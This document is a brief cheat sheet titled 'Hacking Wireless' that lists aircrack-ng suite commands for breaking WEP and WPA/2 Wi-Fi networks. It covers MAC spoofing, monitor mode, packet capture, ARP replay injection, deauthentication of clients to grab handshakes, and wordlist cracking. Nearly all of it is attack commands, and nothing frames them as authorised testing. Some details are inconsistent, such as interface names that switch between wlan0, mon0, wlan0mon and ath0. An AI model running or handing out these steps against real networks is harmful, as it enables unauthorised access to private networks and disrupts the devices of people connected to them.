Hacking Wireless

WEP

Configure Interface:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng mon0

Target AP:

airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

Attack:

aireplay-ng -1 0 -a (bssid) -h aa:bb:cc:dd:ee:ff -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h aa:bb:cc:dd:ee:ff wlan0
(captured data will have to be above 10,000 to crack)

Cracking:

aircrack-ng -b (bssid) (file_name-01.cap)

WPA/2

Configure Interface:

ifconfig wlan0 down
airmon-ng stop wlan0
macchanger --mac=aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng wlan0

Choose your target and then:

airodump-ng --channel 2 wlan0mon -w outputfile_name --bssid 00:1D:AA:9F:77:4C

Attack using AP MAC and Client MAC:

aireplay-ng -0 10 -a 00:04:96:2A:BB:EA -c 5C:59:48:0F:24:9A wlan0
aireplay-ng -0 1 -e thestudio... Wlan0mon

-0 means deauthentication
 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
ath0 is the interface name

Crack the handshake

aircrack-ng -w ~/Desktop/Wordlist/CRACKED_PASS.dic /root/Desktop/CapFileName

It is also possible to crack the hash using Hashcat (better method). You will need to convert the handshake first

Last updated